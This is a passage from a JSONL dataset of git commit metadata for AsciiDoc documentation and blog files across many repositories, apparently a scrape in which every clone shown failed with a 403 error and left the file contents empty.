lasticsearch,EasonYi\/elasticsearch,nrkkalyan\/elasticsearch,Ansh90\/elasticsearch,cnfire\/elasticsearch-1,Shekharrajak\/elasticsearch,hafkensite\/elasticsearch,LewayneNaidoo\/elasticsearch,MichaelLiZhou\/elasticsearch,sreeramjayan\/elasticsearch,rento19962\/elasticsearch,maddin2016\/elasticsearch,infusionsoft\/elasticsearch,LeoYao\/elasticsearch,markharwood\/elasticsearch,strapdata\/elassandra,C-Bish\/elasticsearch,fooljohnny\/elasticsearch,xpandan\/elasticsearch,xingguang2013\/elasticsearch,mjason3\/elasticsearch,glefloch\/elasticsearch,kimimj\/elasticsearch,xpandan\/elasticsearch,Fsero\/elasticsearch,petabytedata\/elasticsearch,diendt\/elasticsearch,achow\/elasticsearch,MisterAndersen\/elasticsearch,jimczi\/elasticsearch,nilabhsagar\/elasticsearch,MetSystem\/elasticsearch,smflorentino\/elasticsearch,jimhooker2002\/elasticsearch,wangtuo\/elasticsearch,Siddartha07\/elasticsearch,Rygbee\/elasticsearch,karthikjaps\/elasticsearch,masterweb121\/elasticsearch,kevinkluge\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,JervyShi\/elasticsearch,kalimatas\/elasticsearch,Rygbee\/elasticsearch,springning\/elasticsearch,pritishppai\/elasticsearch,fekaputra\/elasticsearch,umeshdangat\/elasticsearch,i-am-Nathan\/elasticsearch,strapdata\/elassandra,jango2015\/elasticsearch,MichaelLiZhou\/elasticsearch,jeteve\/elasticsearch,dpursehouse\/elasticsearch,TonyChai24\/ESSource,JackyMai\/elasticsearch,tebriel\/elasticsearch,jpountz\/elasticsearch,dongjoon-hyun\/elasticsearch,djschny\/elasticsearch,mm0\/elasticsearch,Kakakakakku\/elasticsearch,rhoml\/elasticsearch,hirdesh2008\/elasticsearch,episerver\/elasticsearch,snikch\/elasticsearch,Kakakakakku\/elasticsearch,nezirus\/elasticsearch,markharwood\/elasticsearch,hydro2k\/elasticsearch,C-Bish\/elasticsearch,gfyoung\/elasticsearch,nrkkalyan\/elasticsearch,gfyoung\/elasticsearch,girirajsharma\/elasticsearch,coding0011\/elasticsearc
h,KimTaehee\/elasticsearch,kenshin233\/elasticsearch,ouyangkongtong\/elasticsearch,qwerty4030\/elasticsearch,fooljohnny\/elasticsearch,winstonewert\/elasticsearch,jbertouch\/elasticsearch,njlawton\/elasticsearch,schonfeld\/elasticsearch,jpountz\/elasticsearch,Chhunlong\/elasticsearch,scottsom\/elasticsearch,jimhooker2002\/elasticsearch,strapdata\/elassandra-test,vingupta3\/elasticsearch,tkssharma\/elasticsearch,kenshin233\/elasticsearch,Shepard1212\/elasticsearch,YosuaMichael\/elasticsearch,nellicus\/elasticsearch,mjhennig\/elasticsearch,sarwarbhuiyan\/elasticsearch,truemped\/elasticsearch,spiegela\/elasticsearch,lmtwga\/elasticsearch,masterweb121\/elasticsearch,YosuaMichael\/elasticsearch,lydonchandra\/elasticsearch,markllama\/elasticsearch,alexshadow007\/elasticsearch,socialrank\/elasticsearch,StefanGor\/elasticsearch,franklanganke\/elasticsearch,mcku\/elasticsearch,iantruslove\/elasticsearch,karthikjaps\/elasticsearch,humandb\/elasticsearch,robin13\/elasticsearch,Uiho\/elasticsearch,Shepard1212\/elasticsearch,areek\/elasticsearch,kaneshin\/elasticsearch,xingguang2013\/elasticsearch,MetSystem\/elasticsearch,koxa29\/elasticsearch,StefanGor\/elasticsearch,yynil\/elasticsearch,MichaelLiZhou\/elasticsearch,HonzaKral\/elasticsearch,kingaj\/elasticsearch,linglaiyao1314\/elasticsearch,MetSystem\/elasticsearch,weipinghe\/elasticsearch,humandb\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,djschny\/elasticsearch,caengcjd\/elasticsearch,cwurm\/elasticsearch,iamjakob\/elasticsearch,luiseduardohdbackup\/elasticsearch,mcku\/elasticsearch,Shepard1212\/elasticsearch,dylan8902\/elasticsearch,ivansun1010\/elasticsearch,kubum\/elasticsearch,18098924759\/elasticsearch,mapr\/elasticsearch,djschny\/elasticsearch,hafkensite\/elasticsearch,elancom\/elasticsearch,hirdesh2008\/elasticsearch,jprante\/elasticsearch,ImpressTV\/elasticsearch,Liziyao\/elasticsearch,andrestc\/elasticsearch,truemped\/elasticsearch,lightslife\/elasticsearch,onegambler\/elasticsearch,areek\/elasticsearch,Fsero\/elasticsearch,masterweb121\/elasticsearch,hafkensite\/elasticsearch,Brijeshrpatel9\/elasticsearch,mohit\/elasticsearch,robin13\/elasticsearch,pablocastro\/elasticsearch,acchen97\/elasticsearch,queirozfcom\/elasticsearch,mnylen\/elasticsearch,apepper\/elasticsearch,kaneshin\/elasticsearch,F0lha\/elasticsearch,strapdata\/elassandra-test,kimimj\/elasticsearch,C-Bish\/elasticsearch,MjAbuz\/elasticsearch,rlugojr\/elasticsearch,sdauletau\/elasticsearch,lks21c\/elasticsearch,andrestc\/elasticsearch,mcku\/elasticsearch,hydro2k\/elasticsearch,vingupta3\/elasticsearch,Widen\/elasticsearch,jpountz\/elasticsearch,davidvgalbraith\/elasticsearch,mbrukman\/elasticsearch,yuy168\/elasticsearch,likaiwalkman\/elasticsearch,YosuaMichael\/elasticsearch,scottsom\/elasticsearch,fernandozhu\/elasticsearch,mm0\/elasticsearch,javachengwc\/elasticsearch,ImpressTV\/elasticsearch,knight1128\/elasticsearch,kaneshin\/elasticsearch,AndreKR\/elasticsearch,lchennup\/elasticsearch,Chhunlong\/elasticsearch,kunallimaye\/elasticsearch,pritishppai\/elasticsearch,weipinghe\/elasticsearch,knight1128\/elasticsearch,AndreKR\/elasticsearch,qwerty4030\/elasticsearch,apepper\/elasticsearch,wenpos\/elasticsearch,ulkas\/elasticsearch,Charlesdong\/elasticsearch,xuzha\/elasticsearch,markllama\/elasticsearch,trangvh\/elasticsearch,ouyangkongtong\/elasticsearch,wittyameta\/elasticsearch,bestwpw\/elasticsearch,lydonchandra\/elasticsearch,yanjunh\/elasticsearch,geidies\/elasticsearch,mapr\/elasticsearch,luiseduardohdbackup\/elasticsearch,Helen-Zhao\/elasticsearch,artnowo\/elasti
csearch,yuy168\/elasticsearch,F0lha\/elasticsearch,wimvds\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,jango2015\/elasticsearch,NBSW\/elasticsearch,rajanm\/elasticsearch,kunallimaye\/elasticsearch,kaneshin\/elasticsearch,kalburgimanjunath\/elasticsearch,nazarewk\/elasticsearch,polyfractal\/elasticsearch,elancom\/elasticsearch,hanswang\/elasticsearch,dylan8902\/elasticsearch,glefloch\/elasticsearch,wangtuo\/elasticsearch,socialrank\/elasticsearch,franklanganke\/elasticsearch,scottsom\/elasticsearch,wayeast\/elasticsearch,MichaelLiZhou\/elasticsearch,bawse\/elasticsearch,weipinghe\/elasticsearch,yanjunh\/elasticsearch,wimvds\/elasticsearch,Collaborne\/elasticsearch,lzo\/elasticsearch-1,umeshdangat\/elasticsearch,pritishppai\/elasticsearch,Siddartha07\/elasticsearch,koxa29\/elasticsearch,dylan8902\/elasticsearch,kaneshin\/elasticsearch,ESamir\/elasticsearch,iamjakob\/elasticsearch,iamjakob\/elasticsearch,mbrukman\/elasticsearch,bestwpw\/elasticsearch,Shekharrajak\/elasticsearch,Siddartha07\/elasticsearch,liweinan0423\/elasticsearch,GlenRSmith\/elasticsearch,jchampion\/elasticsearch,mute\/elasticsearch,lightslife\/elasticsearch,sreeramjayan\/elasticsearch,wimvds\/elasticsearch,martinstuga\/elasticsearch,SergVro\/elasticsearch,mgalushka\/elasticsearch,strapdata\/elassandra5-rc,nomoa\/elasticsearch,shreejay\/elasticsearch,kcompher\/elasticsearch,iacdingping\/elasticsearch,martinstuga\/elasticsearch,MetSystem\/elasticsearch,fforbeck\/elasticsearch,tsohil\/elasticsearch,socialrank\/elasticsearch,jeteve\/elasticsearch,F0lha\/elasticsearch,polyfractal\/elasticsearch,huanzhong\/elasticsearch,szroland\/elasticsearch,kalimatas\/elasticsearch,nrkkalyan\/elasticsearch,infusionsoft\/elasticsearch,likaiwalkman\/elasticsearch,lydonchandra\/elasticsearch,ydsakyclguozi\/elasticsearch,alexshadow007\/elasticsearch,ricardocerq\/elasticsearch,hydro2k\/elasticsearch,pranavraman\/elasticsearch,andrestc\/elasticsearch,HonzaKral\/elasticsearch,mnylen\/elasticsearch,mbrukman\/elasticsearch,polyfractal\/elasticsearch,fekaputra\/elasticsearch,koxa29\/elasticsearch,bestwpw\/elasticsearch,ImpressTV\/elasticsearch,mortonsykes\/elasticsearch,elancom\/elasticsearch,koxa29\/elasticsearch,avikurapati\/elasticsearch,strapdata\/elassandra5-rc,Liziyao\/elasticsearch,kcompher\/elasticsearch,episerver\/elasticsearch,jimhooker2002\/elasticsearch,GlenRSmith\/elasticsearch,tkssharma\/elasticsearch,clintongormley\/elasticsearch,EasonYi\/elasticsearch,jimhooker2002\/elasticsearch,maddin2016\/elasticsearch,nazarewk\/elasticsearch,pablocastro\/elasticsearch,iantruslove\/elasticsearch,zeroctu\/elasticsearch,masaruh\/elasticsearch,tebriel\/elasticsearch,camilojd\/elasticsearch,zhiqinghuang\/elasticsearch,vroyer\/elasticassandra,shreejay\/elasticsearch,smflorentino\/elasticsearch,lmtwga\/elasticsearch,btiernay\/elasticsearch,wenpos\/elasticsearch,NBSW\/elasticsearch,mikemccand\/elasticsearch,girirajsharma\/elasticsearch,likaiwalkman\/elasticsearch,fooljohnny\/elasticsearch,davidvgalbraith\/elasticsearch,rento19962\/elasticsearch,knight1128\/elasticsearch,linglaiyao1314\/elasticsearch,elancom\/elasticsearch,vingupta3\/elasticsearch,geidies\/elasticsearch,Widen\/elasticsearch,s1monw\/elasticsearch,himanshuag\/elasticsearch,beiske\/elasticsearch,hanswang\/elasticsearch,yongminxia\/elasticsearch,awislowski\/elasticsearch,Ansh90\/elasticsearch,rmuir\/elasticsearch,HarishAtGitHub\/elasticsearch,drewr\/elasticsearch,kenshin233\/elasticsearch,hanswang\/elasticsearch,fekaputra\/elasticsearch,cnfire\/elasticsearch-1,andrestc\/elasticsearch,MetSystem
\/elasticsearch,caengcjd\/elasticsearch,HonzaKral\/elasticsearch,zeroctu\/elasticsearch,markharwood\/elasticsearch,bestwpw\/elasticsearch,slavau\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,hanswang\/elasticsearch,apepper\/elasticsearch,dataduke\/elasticsearch,Widen\/elasticsearch,markwalkom\/elasticsearch,iacdingping\/elasticsearch,beiske\/elasticsearch,PhaedrusTheGreek\/elasticsearch,rlugojr\/elasticsearch,yongminxia\/elasticsearch,pozhidaevak\/elasticsearch,mute\/elasticsearch","old_file":"docs\/java-api\/client.asciidoc","new_file":"docs\/java-api\/client.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8a74d8d0418066581780c519b88ed326f4761c9e","subject":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","message":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"13b2728b400ec0dce6d17cbc9a1d8ee67e9a1538","subject":"Update 2017-02-03-Azure-Machine-Learning-2.adoc","message":"Update 2017-02-03-Azure-Machine-Learning-2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-03-Azure-Machine-Learning-2.adoc","new_file":"_posts\/2017-02-03-Azure-Machine-Learning-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"36ae55f75b8d213ffae528718750ad958aed4313","subject":"Update 2016-01-23-XML-Prague-2016.adoc","message":"Update 2016-01-23-XML-Prague-2016.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-XML-Prague-2016.adoc","new_file":"_posts\/2016-01-23-XML-Prague-2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"82d9a05cc34a703988410f7ba93a76a7ef316909","subject":"Initial commit for the testing guide.","message":"Initial commit for the testing guide.\n","repos":"agoncal\/docs,luiz158\/docs,addonis1990\/docs,agoncal\/docs,forge\/docs,addonis1990\/docs,forge\/docs,luiz158\/docs","old_file":"advanced\/Testing-your-addons.asciidoc","new_file":"advanced\/Testing-your-addons.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/addonis1990\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"67f809a4489f4d2717051f8493bd1cee09c043fc","subject":"Update 
2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","message":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"768b098fe4968a6b64b2022efb801f31a81fc9b1","subject":"Update 2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","message":"Update 2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","new_file":"_posts\/2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"880aae0385e0aba99fbfe384f819c31c4d270dd4","subject":"updating to the latest WildFly Swarm + MySQL sample","message":"updating to the latest WildFly Swarm + MySQL sample\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch05-compose.adoc","new_file":"developer-tools\/java\/chapters\/ch05-compose.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ef2c07a39ee89e4d0510e5ec26ca47c07b8228fd","subject":"Update 2016-09-06-TWCTF.adoc","message":"Update 2016-09-06-TWCTF.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-09-06-TWCTF.adoc","new_file":"_posts\/2016-09-06-TWCTF.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"23f515995fefeef0af58d5a2b856fd1027460670","subject":"Update 2018-07-30-P-H-P.adoc","message":"Update 2018-07-30-P-H-P.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-30-P-H-P.adoc","new_file":"_posts\/2018-07-30-P-H-P.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1e345d54a5ea04d008723f3d0fd9b714405bde40","subject":"Create a README file for DockerHub documentation","message":"Create a README file for DockerHub 
documentation","repos":"asciidoctor\/docker-asciidoctorj","old_file":"dockerfiles\/wildfly82\/README.adoc","new_file":"dockerfiles\/wildfly82\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/asciidoctor\/docker-asciidoctorj.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f76c3a16170fb9117ee6def2ce42e48bec5bfec0","subject":"Update _changelog.adoc","message":"Update _changelog.adoc","repos":"camunda\/camunda-spring-boot-starter,camunda\/camunda-bpm-spring-boot-starter,camunda\/camunda-spring-boot-starter","old_file":"docs\/src\/main\/asciidoc\/_changelog.adoc","new_file":"docs\/src\/main\/asciidoc\/_changelog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camunda\/camunda-spring-boot-starter.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"43a002b8bc422d0731db93f348ee34d7ecd2db19","subject":"Update 2016-12-03-Sunny-Saturday.adoc","message":"Update 2016-12-03-Sunny-Saturday.adoc","repos":"bluenergy\/bluenergy.github.io,bluenergy\/bluenergy.github.io,bluenergy\/bluenergy.github.io,bluenergy\/bluenergy.github.io","old_file":"_posts\/2016-12-03-Sunny-Saturday.adoc","new_file":"_posts\/2016-12-03-Sunny-Saturday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bluenergy\/bluenergy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a5fa8d1c0cb9894f3ef3c3fc19c823e659328d0b","subject":"Update 2017-01-12-Swords-and-Jesus-no-Swords-and-Jews-yes.adoc","message":"Update 2017-01-12-Swords-and-Jesus-no-Swords-and-Jews-yes.adoc","repos":"gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io","old_file":"_posts\/2017-01-12-Swords-and-Jesus-no-Swords-and-Jews-yes.adoc","new_file":"_posts\/2017-01-12-Swords-and-Jesus-no-Swords-and-Jews-yes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gjagush\/gjagush.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ab8396a9a5d0359a09179d8613d77550dd59e8eb","subject":"Added Camel 2.19.2 release notes to docs","message":"Added Camel 2.19.2 release notes to 
docs\n","repos":"tdiesler\/camel,sverkera\/camel,pmoerenhout\/camel,adessaigne\/camel,tadayosi\/camel,CodeSmell\/camel,christophd\/camel,anoordover\/camel,nicolaferraro\/camel,jamesnetherton\/camel,cunningt\/camel,objectiser\/camel,zregvart\/camel,adessaigne\/camel,davidkarlsen\/camel,sverkera\/camel,sverkera\/camel,onders86\/camel,tadayosi\/camel,tadayosi\/camel,nikhilvibhav\/camel,apache\/camel,pmoerenhout\/camel,cunningt\/camel,davidkarlsen\/camel,jamesnetherton\/camel,cunningt\/camel,mcollovati\/camel,CodeSmell\/camel,DariusX\/camel,pmoerenhout\/camel,ullgren\/camel,ullgren\/camel,mcollovati\/camel,gnodet\/camel,kevinearls\/camel,zregvart\/camel,tdiesler\/camel,tadayosi\/camel,kevinearls\/camel,christophd\/camel,kevinearls\/camel,cunningt\/camel,pax95\/camel,nikhilvibhav\/camel,anoordover\/camel,onders86\/camel,onders86\/camel,adessaigne\/camel,mcollovati\/camel,pmoerenhout\/camel,onders86\/camel,pax95\/camel,tadayosi\/camel,kevinearls\/camel,sverkera\/camel,DariusX\/camel,apache\/camel,CodeSmell\/camel,christophd\/camel,gnodet\/camel,tadayosi\/camel,objectiser\/camel,nikhilvibhav\/camel,ullgren\/camel,nicolaferraro\/camel,punkhorn\/camel-upstream,zregvart\/camel,apache\/camel,christophd\/camel,davidkarlsen\/camel,tdiesler\/camel,pax95\/camel,christophd\/camel,pax95\/camel,sverkera\/camel,Fabryprog\/camel,jamesnetherton\/camel,alvinkwekel\/camel,DariusX\/camel,tdiesler\/camel,davidkarlsen\/camel,nikhilvibhav\/camel,anoordover\/camel,onders86\/camel,onders86\/camel,alvinkwekel\/camel,Fabryprog\/camel,Fabryprog\/camel,kevinearls\/camel,alvinkwekel\/camel,sverkera\/camel,objectiser\/camel,apache\/camel,adessaigne\/camel,jamesnetherton\/camel,gnodet\/camel,punkhorn\/camel-upstream,alvinkwekel\/camel,anoordover\/camel,nicolaferraro\/camel,anoordover\/camel,objectiser\/camel,gnodet\/camel,kevinearls\/camel,punkhorn\/camel-upstream,christophd\/camel,nicolaferraro\/camel,cunningt\/camel,adessaigne\/camel,pmoerenhout\/camel,tdiesler\/camel,anoordover\/camel,pax95\/camel,tdiesler\/camel,Fabryprog\/camel,pmoerenhout\/camel,mcollovati\/camel,apache\/camel,apache\/camel,zregvart\/camel,pax95\/camel,cunningt\/camel,jamesnetherton\/camel,DariusX\/camel,punkhorn\/camel-upstream,jamesnetherton\/camel,ullgren\/camel,gnodet\/camel,adessaigne\/camel,CodeSmell\/camel","old_file":"docs\/user-manual\/en\/release-notes\/camel-2192-release.adoc","new_file":"docs\/user-manual\/en\/release-notes\/camel-2192-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e7e6f1d72a385934c0d2af0b9b0ed18519de8d40","subject":"minor formatting changes","message":"minor formatting changes\n","repos":"jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/components\/metrics\/index.adoc","new_file":"src\/main\/jbake\/content\/docs\/components\/metrics\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsanda\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"49c3a5d2ad82dde18e6f31e94180e8bfbe17b3e9","subject":"Update 2017-04-15-Episode-95-King-of-Pin.adoc","message":"Update 
2017-04-15-Episode-95-King-of-Pin.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2017-04-15-Episode-95-King-of-Pin.adoc","new_file":"_posts\/2017-04-15-Episode-95-King-of-Pin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ff7549c77ddb4be14f2289647386ea6e500a7e8a","subject":"Publish 2006-08-01.adoc","message":"Publish 2006-08-01.adoc","repos":"realraindust\/realraindust.github.io,realraindust\/realraindust.github.io,realraindust\/realraindust.github.io,realraindust\/realraindust.github.io","old_file":"2006-08-01.adoc","new_file":"2006-08-01.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/realraindust\/realraindust.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0ecf80f2075f98c5151f9579c3172ae79e324c5b","subject":"Create another_chapter.adoc","message":"Create another_chapter.adoc","repos":"JClingo\/gitbook,JClingo\/gitbook,JClingo\/gitbook,JClingo\/gitbook,JClingo\/gitbook,JClingo\/gitbook","old_file":"another_chapter.adoc","new_file":"another_chapter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/JClingo\/gitbook.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"161f1b5504d66ea724f28a411bfad69072c3ad85","subject":"Update 2015-04-08-TO-DELETE.adoc","message":"Update 2015-04-08-TO-DELETE.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-04-08-TO-DELETE.adoc","new_file":"_posts\/2015-04-08-TO-DELETE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7b9a7c56369ee52b6af329cc7207843d72b0c528","subject":"Update 2016-08-07-Configurar-tu-dominio-de-nicve-con-Git-Hub.adoc","message":"Update 2016-08-07-Configurar-tu-dominio-de-nicve-con-Git-Hub.adoc","repos":"josegomezr\/blog,josegomezr\/blog,josegomezr\/blog,josegomezr\/blog,josegomezr\/blog","old_file":"_posts\/2016-08-07-Configurar-tu-dominio-de-nicve-con-Git-Hub.adoc","new_file":"_posts\/2016-08-07-Configurar-tu-dominio-de-nicve-con-Git-Hub.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/josegomezr\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0b05b5269925965cfeb785d5a54f9b2bee1d60e2","subject":"Update 2017-03-16-Web-Console-methods-and-styling-references.adoc","message":"Update 2017-03-16-Web-Console-methods-and-styling-references.adoc","repos":"metasean\/hubpress.io,metasean\/blog,metasean\/blog,metasean\/blog,metasean\/hubpress.io,metasean\/hubpress.io,metasean\/blog","old_file":"_posts\/2017-03-16-Web-Console-methods-and-styling-references.adoc","new_file":"_posts\/2017-03-16-Web-Console-methods-and-styling-references.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/metasean\/hubpress.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7161460cb27855579d19de111babb23b386b12c7","subject":"anotehr small update","message":"anotehr small update\n","repos":"wofanli\/trex-core,wofanli\/trex-core,wofanli\/trex-core,dimagol\/trex-core,wofanli\/trex-core,kisel\/trex-core,dproc\/trex_odp_porting_integration,kisel\/trex-core,wofanli\/trex-core,dproc\/trex_odp_porting_integration,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dproc\/trex_odp_porting_integration,kisel\/trex-core,dproc\/trex_odp_porting_integration,dproc\/trex_odp_porting_integration,kisel\/trex-core,kisel\/trex-core,dproc\/trex_odp_porting_integration,dimagol\/trex-core,wofanli\/trex-core,kisel\/trex-core","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"036aa947eee556c8f85de665ff85c90d7f468749","subject":"add asciidoc","message":"add asciidoc\n","repos":"bsorrentino\/forge-dynjs-addon,bsorrentino\/forge-js-addon,bsorrentino\/forge-js-addon,bsorrentino\/forge-dynjs-addon","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bsorrentino\/forge-dynjs-addon.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"63247a44d2c7b5068d1159a60d5175d3246427e7","subject":"Add a guide about the SSL support","message":"Add a guide about the SSL support\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/native-and-ssl-guide.adoc","new_file":"docs\/src\/main\/asciidoc\/native-and-ssl-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"70e0dc75e93da420801672878e3dd1888bc1160f","subject":"Creation of ImapMonitor documentation for Jira NMS-6656","message":"Creation of ImapMonitor documentation for Jira NMS-6656\n\nSigned-off-by: Ronny Trommer 